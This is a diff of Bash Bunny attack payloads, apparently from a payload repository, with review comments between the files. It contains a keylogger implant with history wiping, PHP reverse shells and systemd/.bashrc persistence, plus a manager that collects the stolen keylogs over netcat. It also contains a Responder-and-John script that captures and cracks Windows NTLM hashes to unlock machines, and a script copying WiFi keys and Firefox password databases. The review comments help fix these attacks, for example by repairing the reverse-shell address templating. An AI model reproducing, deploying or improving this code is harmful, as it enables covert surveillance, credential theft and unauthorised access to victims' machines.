Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Mounting BashBunny]
|
||||
Q STRING udisksctl mount -b /dev/'$disk'
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
|
||||
# [transfering payload script]
|
||||
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
|
||||
Q ENTER
|
||||
Q STRING chmod +x /tmp/payload.sh
|
||||
Q ENTER
|
||||
Q STRING /tmp/./payload.sh
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING rm /tmp/payload.sh
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
|
||||
# [Unmounting BashBunny]
|
||||
Q STRING udisksctl unmount -b /dev/'$disk'
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
LED FINISH
|
|
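Review bot: the header is stale for a 2.0 release: `# Title: BunnyLogger`, `# Version: 1.0` and the 1.0 description are copied over unchanged, and `# Target: Unix-like operating systems with systemd.` should also mention udisks2 (`udisksctl`) and, given the 1.0 payload.sh in this commit, an X session for `xinput`. The flow still expects the attacker-specific script at `'$mntt'/payloads/payload.sh`, but in 2.0 that file is generated by `bunnyLoggerMgr` (Create new target) into a directory of the operator's choosing; neither this file nor the README says it must be copied to the Bunny's `payloads/` root before use. The label-based lookup `disk='$(lsblk -fs | grep BashBunny | awk ...)'` is a good fix over the 1.0 size match; `udisksctl mount` also prints the mount path on success, which would be a more direct source for `mntt` than the second `lsblk | grep $disk | awk '{print $7}'` pass.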
@ -0,0 +1,191 @@
|
|||
#!/bin/bash
|
||||
allowAbort=true;
|
||||
myInterruptHandler()
|
||||
{
|
||||
if $allowAbort; then
|
||||
echo
|
||||
echo -e "\n\033[1;34m[INFO]: \e[0mYou terminated bunnyLoggerMgr..." && exit 1;
|
||||
fi;
|
||||
}
|
||||
trap myInterruptHandler SIGINT
|
||||
echo -e "\033[4m\033[1mWelcome to BunnyLogger Manager!!!\033[0m"
|
||||
echo
|
||||
echo -e "1] Fetch Keylogs.\n2] Create new target.\n3] List available target.\n4] Remove target.\n5] Update target.\n6] Decode Key Logs."
|
||||
echo
|
||||
read -p "Enter your choice: " ch
|
||||
create(){
|
||||
read -p "Enter Target's name(without whitespaces): " name
|
||||
if [[ $(grep -oh "\w*$name\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $name ]]; then
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mName \"$name\" already exists."
|
||||
exit 1
|
||||
fi
|
||||
read -p "Enter Servers IP: " ip
|
||||
read -p "Enter Unique Port Number(1500-65535): " port
|
||||
read -p "Enter another Unique Port Number(1500-65535): " secPort
|
||||
if [ "$port" == "$secPort" ]; then
|
||||
echo -e "\033[1;34m[INFO]: \033[0mTwo ports can't be similar."
|
||||
exit 1
|
||||
fi
|
||||
if [[ $(grep -oh "\w*$ip\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $ip ]] && [[ $(grep -oh "\w*$port\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $port ]] && [[ $(grep -oh "\w*$secPort\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $secPort ]]; then
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mTarget exist with similar IP address \"$ip\" and port number one \"$port\", port number two \"$secPort\"."
|
||||
exit 1
|
||||
fi
|
||||
max=65535
|
||||
min=1500
|
||||
if [[ $ip =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] && (( $port <= $max )) && (( $port >= $min )) && (( $secPort <= $max )) && (( $secPort >= $min )); then
|
||||
read -p "Specify directory for output: " dir
|
||||
if [ ! -d "$dir" ]; then
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
|
||||
exit 1
|
||||
else
|
||||
cp -r ~/.config/bunnyLogger/payload.sh $dir
|
||||
fi
|
||||
sed -i -e "s/0.0.0.0/$ip/g" $dir/payload.sh
|
||||
sed -i -e "s/4444/$port/g" $dir/payload.sh
|
||||
sed -i -e "s/5555/$secPort/g" $dir/payload.sh
|
||||
echo -e "$(echo "$name"|xargs)\t$ip\t$port\t$secPort" >> ~/.config/bunnyLogger/bunnyLogger.db
|
||||
else
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid IP address \"$ip\" or Port Number \"$port\" or Port Number \"$secPort\"."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
}
|
||||
list(){
|
||||
|
||||
column -t -o ' ' ~/.config/bunnyLogger/bunnyLogger.db | awk '{print NR" - "$0}'
|
||||
}
|
||||
remove(){
|
||||
echo
|
||||
list
|
||||
echo
|
||||
read -p "Enter name of target to remove: " rmv
|
||||
if grep -q $rmv ~/.config/bunnyLogger/bunnyLogger.db; then
|
||||
sed -i "/\b\($rmv\)\b/d" ~/.config/bunnyLogger/bunnyLogger.db
|
||||
echo -e "\033[1;34m\e[1m[INFO]: \e[0m Successfully Removed \"$rmv\"."
|
||||
else
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$rmv\" no such target found."
|
||||
fi
|
||||
}
|
||||
update(){
|
||||
echo
|
||||
list
|
||||
echo
|
||||
read -p "Choose target number: " cho
|
||||
read -p "You want to update (ip|portOne|portTwo): " ent
|
||||
if [ "$ent" = ip ]
|
||||
then
|
||||
one=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
|
||||
read -p "Enter new ip: " use
|
||||
if [[ $use =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
|
||||
sed -i -e "$cho s/$one/$use/g" ~/.config/bunnyLogger/bunnyLogger.db
|
||||
echo -e "\033[1;34m\e[1m[INFO]: \e[0mSuccessfully Updated IP."
|
||||
else
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid IP address \"$use\"."
|
||||
exit
|
||||
fi
|
||||
elif [ "$ent" = portOne ]
|
||||
then
|
||||
two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 3}')
|
||||
read -p "Enter new Port number: " useP
|
||||
max=65535
|
||||
min=1500
|
||||
if (( $useP <= $max )) && (( $useP >= $min )); then
|
||||
sed -i -e "$cho s/$two/$useP/g" ~/.config/bunnyLogger/bunnyLogger.db
|
||||
echo -e "\033[1;34m\e[1m[INFO]: \e[0mUpdated Port number\"$ent\"."
|
||||
else
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Port Number \"$useP\"."
|
||||
fi
|
||||
elif [ "$ent" = portTwo ]
|
||||
then
|
||||
two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 4}')
|
||||
read -p "Enter new Port number: " useP
|
||||
max=65535
|
||||
min=1500
|
||||
if (( $useP <= $max )) && (( $useP >= $min )); then
|
||||
sed -i -e "$cho s/$two/$useP/g" ~/.config/bunnyLogger/bunnyLogger.db
|
||||
echo -e "\033[1;34m\e[1m[INFO]: \e[0mUpdated Port number\"$ent\"."
|
||||
else
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Port Number \"$useP\"."
|
||||
fi
|
||||
else
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e0m[Invalid choice \"$ent\"."
|
||||
fi
|
||||
}
|
||||
fetch(){
|
||||
echo
|
||||
list
|
||||
echo
|
||||
read -p "Enter Target number to connect: " cho
|
||||
one=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
|
||||
two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 3}')
|
||||
three=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 4}')
|
||||
echo -en "1] Live Capture \t2]Fetch Stored Logs: "
|
||||
read typ
|
||||
case $typ in
|
||||
1)
|
||||
read -p "Specify directory for output: " dir
|
||||
read -p "Enter filename to store logs: " filename
|
||||
if [ ! -d "$dir" ]; then
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
|
||||
exit 1
|
||||
else
|
||||
echo "\033[1;34m\e[1m[[INFO]: \e[0mStarted Keylogs Capture..."
|
||||
nc -lvp $two > $dir/$filename.log
|
||||
fi
|
||||
;;
|
||||
2)
|
||||
read -p "Specify directory for output: " dir
|
||||
read -p "Enter filename to store logs: " filename
|
||||
if [ ! -d "$dir" ]; then
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
|
||||
exit 1
|
||||
else
|
||||
nc -lvp 1444 > $dir/$filename.log &
|
||||
nc -lvp $three
|
||||
fi
|
||||
;;
|
||||
*)
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Choice.."
|
||||
;;
|
||||
esac
|
||||
}
|
||||
decode(){
|
||||
echo -e "1] Normal Decode \t2] Informative Decode"
|
||||
read -p "Enter your choice: " cho
|
||||
read -p "Enter path of file to decode: " path
|
||||
read -p "Enter path for decoded log: " out
|
||||
case $cho in
|
||||
1)
|
||||
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $path | grep press | awk '{print $4}' > $out
|
||||
;;
|
||||
2)
|
||||
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $path > $out
|
||||
;;
|
||||
*)
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Choice \"$cho\"."
|
||||
;;
|
||||
esac
|
||||
}
|
||||
case $ch in
|
||||
1)
|
||||
fetch
|
||||
;;
|
||||
2)
|
||||
create
|
||||
;;
|
||||
3)
|
||||
list
|
||||
;;
|
||||
4)
|
||||
update
|
||||
;;
|
||||
5)
|
||||
remove
|
||||
;;
|
||||
6)
|
||||
decode
|
||||
;;
|
||||
*)
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: Invalid Choice \"$ch\"."
|
||||
;;
|
||||
esac
|
|
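Review bot: the menu and the dispatcher disagree. The prompt lists `4] Remove target.` and `5] Update target.`, but the closing `case $ch in` runs `4) update` and `5) remove`, so choosing 4 to remove a target opens the update flow and vice versa; swap the two cases or the menu text. Smaller fixes in the same file: the live-capture banner `echo "\033[1;34m\e[1m[[INFO]: \e[0mStarted Keylogs Capture..."` lacks `-e` and prints the escapes literally; the invalid-choice branch of update() has `\e0m[` where `\e[0m` is meant; and the duplicate-name test `grep -oh "\w*$name\w*" ... == $name` is an unquoted substring match, so `awk -v n="$name" '$1==n'` against the first column of bunnyLogger.db is the safer check. The update() port branches also `sed` the whole line, so a new port value that already appears as the other port or inside the IP gets rewritten too; edit the specific column with awk instead.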
@ -0,0 +1,41 @@
|
|||
#!/bin/bash
|
||||
transfer(){
|
||||
echo -e "\033[1;34m[INFO]: Target Logs:\033[0m"
|
||||
cd /var/tmp/.system/logs/
|
||||
ls /var/tmp/.system/logs/ | sort
|
||||
echo
|
||||
echo -n "Enter filename to transfer: "
|
||||
read ch
|
||||
if [ -f $ch ];
|
||||
then
|
||||
echo -e "\033[1;34m[INFO]: Transferring file...\033[0m"
|
||||
/var/tmp/.system/./nc -q 0 127.0.0.1 1444 < $ch >/dev/null 2>&1
|
||||
if [ $? -eq 0 ]; then
|
||||
echo -e "\033[1;32m[SUCCESS]: File Transferred.\033[0m"
|
||||
else
|
||||
echo -e "\033[1;34m[INFO]: Netcat listner is not running on Attacking system.\033[0m\n\033[1;31m[ERROR]: File transfer failed.\033[0m"
|
||||
fi
|
||||
else
|
||||
echo -e "\033[1;31m[ERROR]: Invalid Filename \"$ch\".\033[0m"
|
||||
fi
|
||||
}
|
||||
conti(){
|
||||
while :
|
||||
do
|
||||
echo
|
||||
echo -n "Would you like to transfer more files? [Y/N]: "
|
||||
read ch
|
||||
if [ "$ch" = y ] || [ "$ch" = Y ];
|
||||
then
|
||||
transfer
|
||||
elif [ "$ch" = N ] || [ "$ch" = n ];
|
||||
then
|
||||
echo -e "\033[1;34m[INFO]: Terminating...\033[0m"
|
||||
break
|
||||
else
|
||||
echo -e "\033[1;31m[ERROR]: Invalid Choice \"$ch\".\033[0m"
|
||||
fi
|
||||
done
|
||||
}
|
||||
transfer
|
||||
conti
|
|
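Review bot: the file transfer cannot reach the operator. clctrl runs on the victim (payload.sh hands it the reverse connection on port 5555), and `/var/tmp/.system/./nc -q 0 127.0.0.1 1444 < $ch` connects to the victim's own loopback, whereas the manager's fetch() listens with `nc -lvp 1444` on the operator host. Nothing rewrites that address: create() applies its `sed` substitutions to payload.sh only, never to clctrl. Either template the address here as well and add clctrl to the list of files create() rewrites, or have payload.sh drop the configured IP into a file under /var/tmp/.system that clctrl reads. Also quote `$ch` in `[ -f $ch ]` and in the redirection, and bail out if `cd /var/tmp/.system/logs/` fails instead of listing and transferring from whatever directory the shell happens to be in.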
@ -0,0 +1,28 @@
|
|||
#!/bin/bash
|
||||
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
|
||||
mkdir -p /var/tmp/.system/logs
|
||||
lol=$(lsblk | grep 1.8G)
|
||||
disk=$(echo $lol | awk '{print $1}')
|
||||
mntt=$(lsblk | grep $disk | awk '{print $7}')
|
||||
cp -r $mntt/tools/xinput /var/tmp/.system/
|
||||
cp -r $mntt/payloads/library/bunnyLogger2/clctrl /var/tmp/.system/
|
||||
cp -r $mntt/payloads/library/bunnyLogger2/nc /var/tmp/.system/
|
||||
chmod +x /var/tmp/.system/nc
|
||||
echo -e "name=\$(date +\"%y-%m-%d-%T\")\n/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test > /var/tmp/.system/logs/\$name.log &\n/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
|
||||
chmod +x /var/tmp/.system/sys
|
||||
chmod +x /var/tmp/.system/clctrl
|
||||
chmod +x /var/tmp/.system/xinput
|
||||
echo -e "while :\ndo\n\tping -c 5 127.0.0.1\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"127.0.0.1\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone &\nwhile :\ndo\n\tping -c 5 127.0.0.1\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"127.0.0.1\",5555);exec("\"/var/tmp/.system/./clctrl "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
|
||||
chmod +x /var/tmp/.system/systemBus
|
||||
mkdir -p ~/.config/systemd/user
|
||||
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
|
||||
echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
|
||||
chmod +x /var/tmp/.system/reboot
|
||||
echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
|
||||
systemctl --user daemon-reload
|
||||
systemctl --user enable --now systemBUS.service
|
||||
systemctl --user start --now systemBUS.service
|
||||
systemctl --user enable --now reboot.service
|
||||
systemctl --user start --now reboot.service
|
||||
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
|
||||
chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
|
|
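Review bot: the manager's IP substitution never matches this template. create() rewrites the generated copy with `sed -i -e "s/0.0.0.0/$ip/g"`, `s/4444/$port/g` and `s/5555/$secPort/g`, but the reverse-connect lines written into systemBus here use `127.0.0.1` (`fsockopen(\"127.0.0.1\",4444)` and `ping -c 5 127.0.0.1`), so the ports are swapped in while the address stays loopback and the implant connects to the victim itself. Change the placeholders here to `0.0.0.0`, or change the sed pattern to `127\.0\.0\.1` (with the dots escaped; an unescaped `0.0.0.0` also matches unrelated text). Two smaller points: `rm -f $HISTFILE` runs after `unset HISTFILE`, so it deletes nothing, and `$?` inside the double-quoted `echo -e` for systemBus is expanded at install time (to the status of the preceding chmod), so the written script contains `if [ 0 -eq 0 ]` and the ping reachability check is a no-op.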
@ -0,0 +1,4 @@
|
|||
#!/bin/bash
|
||||
loc=$HOME/.config/bunnyLogger
|
||||
rm -rf $loc
|
||||
sudo rm /usr/local/bin/bunnyLoggerMgr
|
|
@ -0,0 +1,111 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
#Author: rf_bandit
|
||||
#Version: Version 1.0
|
||||
#Credit: Hak5Darren, Mubix, catatonic, mame82
|
||||
#Firmware: 1.7
|
||||
#Date: May 2023
|
||||
#
|
||||
# Options
|
||||
RESPONDER_OPTIONS="-w -r -d -P"
|
||||
LOOTDIR=/root/udisk/loot/bunnypicker
|
||||
WORDFILE= <PATH TO DICTIONARY HERE>
|
||||
#eg /tools/john/password.lst
|
||||
# or install via tools folding in arming mode (/tools/<wordlist>)
|
||||
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
|
||||
|
||||
# Check for responder and john
|
||||
REQUIRETOOL responder
|
||||
REQUIRETOOL john
|
||||
|
||||
# Setup Attack
|
||||
LED SETUP
|
||||
|
||||
# Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET
|
||||
ATTACKMODE HID RNDIS_ETHERNET
|
||||
#ATTACKMODE ECM_ETHERNET
|
||||
|
||||
# Set convenience variables
|
||||
GET TARGET_HOSTNAME
|
||||
GET TARGET_IP
|
||||
|
||||
# Setup named logs in loot directory
|
||||
mkdir -p $LOOTDIR
|
||||
HOST=${TARGET_HOSTNAME}
|
||||
# If hostname is blank set it to "noname"
|
||||
[[ -z "$HOST" ]] && HOST="noname"
|
||||
COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
|
||||
COUNT=$((COUNT+1))
|
||||
mkdir -p $LOOTDIR/$HOST-$COUNT
|
||||
|
||||
# As a backup also copy logs to a loot directory in /root/loot/
|
||||
mkdir -p /root/loot/bunnypicker/$HOST-$COUNT
|
||||
|
||||
# Check target IP address. If unset, blink RED and end.
|
||||
if [ -z "${TARGET_IP}" ]; then
|
||||
LED FAIL2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Set LED yellow, run attack
|
||||
LED ATTACK
|
||||
cd /tools/responder
|
||||
|
||||
# Clean logs directory
|
||||
rm logs/*
|
||||
|
||||
# Run Responder with specified options
|
||||
python Responder.py -I usb0 $RESPONDER_OPTIONS &
|
||||
|
||||
# Wait until NTLM log is found
|
||||
until [ -f logs/*NTLM* ]
|
||||
do
|
||||
# Ima just loop here until NTLM logs are found
|
||||
sleep 1
|
||||
done
|
||||
|
||||
# copy logs to loot directory
|
||||
cp logs/* /root/loot/bunnypicker/$HOST-$COUNT
|
||||
cp logs/* $LOOTDIR/$HOST-$COUNT
|
||||
|
||||
# Sync USB disk filesystem
|
||||
sync
|
||||
|
||||
#kill responder
|
||||
killall python
|
||||
killall python
|
||||
killall python
|
||||
|
||||
#Cracking begins!
|
||||
cd /tools/john
|
||||
LED STAGE1
|
||||
#This should be a small wordlist as we are looking for lowhanging fuit. We can do 100K passwords in ~1 second.
|
||||
#We could go CUCMBER PLAID here but its probably not needed
|
||||
./john --wordlist=$WORDFILE --pot=/root/loot/bunnypicker/$HOST-$COUNT/john.pot /root/loot/bunnypicker/$HOST-$COUNT/*.txt
|
||||
|
||||
|
||||
# Check john.pot If empty blink RED and end. Move to offline attack.
|
||||
if [[ -z $(grep '[^[:space:]]' /root/loot/bunnypicker/$HOST-$COUNT/john.pot) ]]; then
|
||||
LED FAIL3
|
||||
exit 1
|
||||
fi
|
||||
|
||||
#This will copy our cracked password to the loot folder for future use.
|
||||
LED STAGE2
|
||||
awk NR==1 /root/loot/bunnypicker/$HOST-$COUNT/john.pot | cut -d: -f2 > $LOOTDIR/$HOST-$COUNT/$HOST-$COUNT-pass.txt
|
||||
echo -n "STRING " > $PAYLOAD_DIR/pass.txt
|
||||
cat $LOOTDIR/$HOST-$COUNT/$HOST-$COUNT-pass.txt >> $PAYLOAD_DIR/pass.txt
|
||||
|
||||
#This should unlock the machine with our cracked password.
|
||||
#$PAYLOAD_DIR would not work with QUACK
|
||||
QUACK ESC
|
||||
DELAY 100
|
||||
QUACK $SWITCH_POSITION/pass.txt
|
||||
QUACK ENTER
|
||||
rm $PAYLOAD_DIR/pass.txt
|
||||
|
||||
LED CLEANUP
|
||||
sync
|
||||
|
||||
# When the light turns green its a hacked machine.
|
||||
LED FINISH
|
|
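Review bot: `WORDFILE= <PATH TO DICTIONARY HERE>` is not a safe placeholder. As committed bash rejects the line (the trailing `>` has no target), so the payload stops before `REQUIRETOOL` unless the user edits it, and nothing later verifies the list before `./john --wordlist=$WORDFILE ...`. Default to the bundled list and check it, e.g. `WORDFILE=${WORDFILE:-/tools/john/password.lst}` followed by `[ -f "$WORDFILE" ] || { LED FAIL; exit 1; }`, which is exactly what the README's future-work note asks for. Two more: `until [ -f logs/*NTLM* ]` only behaves when exactly one file matches (two matches make `[` error out, the test stays false and the loop spins forever), so use `ls logs/*NTLM* >/dev/null 2>&1` or `compgen -G 'logs/*NTLM*'`; and `killall python` three times kills every python process on the Bunny rather than just Responder, so capture `$!` after `python Responder.py -I usb0 $RESPONDER_OPTIONS &` and `kill` that PID.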
@ -0,0 +1,117 @@
|
|||
# Bunnypicker (Win10 Lockpicker for Bash Bunny)
|
||||
.______ __ __ .__ __. .__ __. ____ ____ .______ __ ______ __ ___ _______ .______
|
||||
| _ \ | | | | | \ | | | \ | | \ \ / / | _ \ | | / || |/ / | ____|| _ \
|
||||
| |_) | | | | | | \| | | \| | \ \/ / | |_) | | | | ,----'| ' / | |__ | |_) |
|
||||
| _ < | | | | | . ` | | . ` | \_ _/ | ___/ | | | | | < | __| | /
|
||||
| |_) | | `--' | | |\ | | |\ | | | | | | | | `----.| . \ | |____ | |\ \----.
|
||||
|______/ \______/ |__| \__| |__| \__| |__| | _| |__| \______||__|\__\ |_______|| _| `._____|
|
||||
,
|
||||
/| __
|
||||
/ | ,-~ /
|
||||
Y :| // /
|
||||
| jj /( .^
|
||||
>-"~"-v"
|
||||
/ Y
|
||||
jo o |
|
||||
( ~T~ j
|
||||
>._-' _./
|
||||
/ "~" |
|
||||
Y _, |
|
||||
/| ;-"~ _ l
|
||||
/ l/ ,-"~ \
|
||||
\//\/ .- \
|
||||
Y / Y -Row
|
||||
l I !
|
||||
]\ _\ /"\
|
||||
(" ~----( ~ Y. )
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
|
||||
Author: rf_bandit
|
||||
Version: Version 1.0
|
||||
Credit: Hak5Darren, Mubix, catatonic, mame82
|
||||
Firmware: 1.7
|
||||
Target: Windows 10/11
|
||||
Date: May 2023
|
||||
|
||||
## Description
|
||||
This is based on Quickcreds, Jackalope, and Win10Lockpicker (for the OG P4wnP1)
|
||||
Snags credentials from locked machines
|
||||
Implements a responder attack. Saves creds to the loot folder on the USB Disk
|
||||
Looks for *NTLM* log files
|
||||
Cracks hash with John the Ripper. Best with a smaller dictionary.
|
||||
Saves cracked hash to loot folder
|
||||
Quacks password and unlocks machine
|
||||
|
||||
On a current (May 2023) Win10/Win11 machine, it shouldn't take more about 35 seconds to get a hash.
|
||||
If attack stage lasts longer than ~1, try disconnecting/reconnecting from wifi/network.
|
||||
We can run through 100K simple passwords in 1 second.
|
||||
Best time I got was 29.60 seconds from Bash Bunny boot to machine unlock.
|
||||
|
||||
|
||||
|
||||
## Configuration
|
||||
.
|
||||
Configured for Windows. Not tested on Mac/*nix
|
||||
The path to the wordfile needs to be configured, eg /tools/<your-file-here> or /tools/john/password.lst (included) . The most straightforwrd way to get a large wordlist is to put it in the /tools folder in arming mode. A future version could check for a wordlist in /tools and if not found fallback to the included /tools/john/password.lst.
|
||||
|
||||
|
||||
## Requirements
|
||||
|
||||
Responder must be in /tools/responder/
|
||||
(Can be otained from https://forums.hak5.org/topic/40971-info-tools/)
|
||||
JtR must be in /tools/john
|
||||
Requires initial setup (below)
|
||||
|
||||
## Initial Setup
|
||||
Install responder from https://forums.hak5.org/topic/40971-info-tools/
|
||||
|
||||
Replace /etc/apt/sources.list with:
|
||||
deb http://archive.debian.org/debian/ jessie main non-free contrib
|
||||
deb-src http://archive.debian.org/debian/ jessie main non-free contrib
|
||||
deb http://archive.debian.org/debian-security/ jessie/updates main non-free contrib
|
||||
deb-src http://archive.debian.org/debian-security/ jessie/updates main non-free contrib
|
||||
|
||||
apt update (DO NOT RUN apt upgrade as it will break RNDIS_ETHERNET. Not entirely clear why.)
|
||||
|
||||
The john package included can't handle NTLM hashes so we will make our own.
|
||||
Install gcc and git if you don't have them.
|
||||
|
||||
apt-get install gcc
|
||||
|
||||
apt-get install git
|
||||
git config --global http.sslverify "false" (this is insecure but I'm not worried)
|
||||
|
||||
git clone https://github.com/openwall/john
|
||||
|
||||
cd john
|
||||
./configure && make
|
||||
mv run /tools/john
|
||||
cd ..
|
||||
rm -r john (not required but a space saving measure)
|
||||
|
||||
|
||||
## STATUS
|
||||
|
||||
|
||||
| Status | Description |
|
||||
| ------------------- | ---------------------------------------- |
|
||||
| LED SETUP | Starting |
|
||||
| LED ATTACK | Grabbing creds |
|
||||
| LED STAGE1 | Running JtR |
|
||||
| LED STAGE2 | Unlocking |
|
||||
| LED CLEANUP | Sync to disk |
|
||||
| LED FINISH | Trap is clean |
|
||||
| FAIL1 | Responder not found at /tools/responder |
|
||||
| FAIL2 | Target did not aquire IP address |
|
||||
| FAIL3 | Hash not cracked - move to offline attack|
|
||||
|
||||
## ADDITIONAL NOTES
|
||||
|
||||
For debugging its better to use LED B for STAGE1 and LED W for STAGE2 because its easier to pinpoint failure.
|
||||
A future version could check for a wordlist in /tools and if not found fallback to /tools/john/password.lst.
|
||||
Might also steal catatonic's use of the switch (very cool) to initiate password quacking to make the payload more versatile on both locked
|
||||
and unlocked machines.
|
||||
|
||||
This was fun to make. Thanks to everyone who put in all the hard work before me.
|
||||
|
|
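Review bot: the setup section tells readers to run `git config --global http.sslverify "false"` before cloning john from GitHub. That disables TLS verification for every future git operation on the device and leaves the cracking binary built from that clone open to a tampered download; the actual problem on an old jessie image is the stale CA bundle, so `apt-get install ca-certificates` (or building john on a workstation and copying `run/` into /tools/john) is the right fix, and the global setting should at least be reverted after the clone. Also `If attack stage lasts longer than ~1, try disconnecting/reconnecting` is missing its unit (the preceding sentence says 35 seconds, so presumably ~1 minute), and the STATUS table lists `FAIL1 | Responder not found at /tools/responder` although the payload never sets FAIL1 itself; it relies on `REQUIRETOOL`, so say so or drop the row.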
@ -0,0 +1,6 @@
|
|||
mkdir %~dp0\loot\%COMPUTERNAME%
|
||||
cd /D %~dp0\loot\%COMPUTERNAME% && netsh wlan export profile key=clear
|
||||
C: cd \D %appdata%\mozilla\firefox\profiles\
|
||||
cd %appdata%\mozilla\firefox\profiles\*.default-release\
|
||||
copy key4.db %~dp0\loot\%COMPUTERNAME%
|
||||
copy logins.json %~dp0\loot\%COMPUTERNAME%
|
|
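Review bot: on the third line, `C: cd \D %appdata%\mozilla\firefox\profiles\`, only the `C:` drive switch takes effect; the `cd` after it is lost (cmd treats the rest of the line as arguments to the drive switch) and `\D` is not the `/D` switch in any case, so the script reaches the profile directory only because line 4 does a second `cd` on the now-current C: drive. Collapse lines 3 and 4 into `cd /D "%appdata%\Mozilla\Firefox\Profiles\*.default-release"` and quote the copy targets, since `%appdata%` can contain spaces. The payload also grabs only the `*.default-release` profile and silently skips machines whose profile is `*.default` or custom-named; `key4.db` and `logins.json` are only useful as a matching pair, so loop over `%appdata%\Mozilla\Firefox\Profiles\*` with `for /d` and copy each pair into its own subfolder. Minor: `%~dp0` already ends in a backslash, so `%~dp0\loot` doubles the separator; `%~dp0loot` is the idiom.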
@ -0,0 +1,45 @@
|
|||
# Title: FireSnatcher
|
||||
# Description: Copies Wifi Keys, and Firefox Password Databases
|
||||
# Author: KarrotKak3
|
||||
# Props: saintcrossbow & 0i41E
|
||||
# Version: 1.0.2.0 (Work in Progress)
|
||||
# Category: Credentials
|
||||
# Target: Windows (Logged in)
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
# Full Description
|
||||
# ----------------
|
||||
# Attacks an Unlocked Windows Machine
|
||||
# Payload targets:
|
||||
# - All WiFi creds
|
||||
# - Firefox Saved Password Database
|
||||
#
|
||||
# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC
|
||||
# Delays to Allow Powershell Time to Open and to Give Attack time to Run
|
||||
|
||||
# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT
|
||||
